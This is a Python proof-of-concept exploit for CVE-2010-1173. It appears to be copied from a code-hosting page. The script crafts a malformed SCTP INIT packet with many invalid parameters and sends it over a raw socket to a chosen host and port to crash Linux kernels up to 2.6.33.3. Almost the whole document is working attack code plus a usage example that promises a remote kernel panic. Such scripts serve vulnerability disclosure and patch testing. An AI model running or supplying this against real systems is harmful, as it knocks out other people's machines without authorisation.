115 lines
No EOL
2.6 KiB
Python
Executable file
115 lines
No EOL
2.6 KiB
Python
Executable file
# From: http://jon.oberheide.org/files/sctp-boom.py
|
|
#!/usr/bin/env python
|
|
|
|
'''
|
|
sctp-boom.py
|
|
|
|
Linux Kernel <= 2.6.33.3 SCTP INIT Remote DoS
|
|
Jon Oberheide <jon@oberheide.org>
|
|
http://jon.oberheide.org
|
|
|
|
Information:
|
|
|
|
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1173
|
|
|
|
The sctp_process_unk_param function in net/sctp/sm_make_chunk.c in the
|
|
Linux kernel 2.6.33.3 and earlier, when SCTP is enabled, allows remote
|
|
attackers to cause a denial of service (system crash) via an SCTPChunkInit
|
|
packet containing multiple invalid parameters that require a large amount
|
|
of error data.
|
|
|
|
Usage:
|
|
|
|
$ python sctp-boom.py 1.2.3.4 19000
|
|
[+] sending malformed SCTP INIT msg to 1.2.3.4:19000
|
|
...
|
|
[+] kernel should have panicked on remote host 1.2.3.4
|
|
|
|
Requirements:
|
|
|
|
* dnet: http://libdnet.sourceforge.net/
|
|
* dpkt: http://code.google.com/p/dpkt/
|
|
|
|
'''
|
|
|
|
import os, sys, socket
|
|
|
|
def err(txt):
|
|
print '[-] error: %s' % txt
|
|
sys.exit(1)
|
|
|
|
def msg(txt):
|
|
print '[+] %s' % txt
|
|
|
|
def usage():
|
|
print >> sys.stderr, 'usage: %s host port' % sys.argv[0]
|
|
sys.exit(1)
|
|
|
|
try:
|
|
import dpkt
|
|
except ImportError:
|
|
err('requires dpkt library: http://code.google.com/p/dpkt/')
|
|
|
|
try:
|
|
import dnet
|
|
except ImportError:
|
|
try:
|
|
import dumbnet as dnet
|
|
except ImportError:
|
|
err('requires dnet library: http://libdnet.sourceforge.net/')
|
|
|
|
def main():
|
|
if len(sys.argv) != 3:
|
|
usage()
|
|
|
|
host = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
|
|
try:
|
|
sock = dnet.ip()
|
|
intf = dnet.intf()
|
|
except OSError:
|
|
err('requires root privileges for raw socket access')
|
|
|
|
dst_addr = socket.gethostbyname(host)
|
|
interface = intf.get_dst(dnet.addr(dst_addr))
|
|
src_addr = interface['addr'].ip
|
|
|
|
msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port))
|
|
|
|
invalid = ''
|
|
invalid += '\x20\x10\x11\x73'
|
|
invalid += '\x00\x00\xf4\x00'
|
|
invalid += '\x00\x05'
|
|
invalid += '\x00\x05'
|
|
invalid += '\x20\x10\x11\x73'
|
|
|
|
for i in xrange(20):
|
|
invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff'
|
|
|
|
init = dpkt.sctp.Chunk()
|
|
init.type = dpkt.sctp.INIT
|
|
init.data = invalid
|
|
init.len = len(init)
|
|
|
|
sctp = dpkt.sctp.SCTP()
|
|
sctp.sport = 0x1173
|
|
sctp.dport = port
|
|
sctp.data = [ init ]
|
|
|
|
ip = dpkt.ip.IP()
|
|
ip.src = src_addr
|
|
ip.dst = dnet.ip_aton(dst_addr)
|
|
ip.p = dpkt.ip.IP_PROTO_SCTP
|
|
ip.data = sctp
|
|
ip.len = len(ip)
|
|
|
|
print `ip`
|
|
|
|
pkt = dnet.ip_checksum(str(ip))
|
|
sock.send(pkt)
|
|
|
|
msg('kernel should have panicked on remote host %s' % (dst_addr))
|
|
|
|
if __name__ == '__main__':
|
|
main() |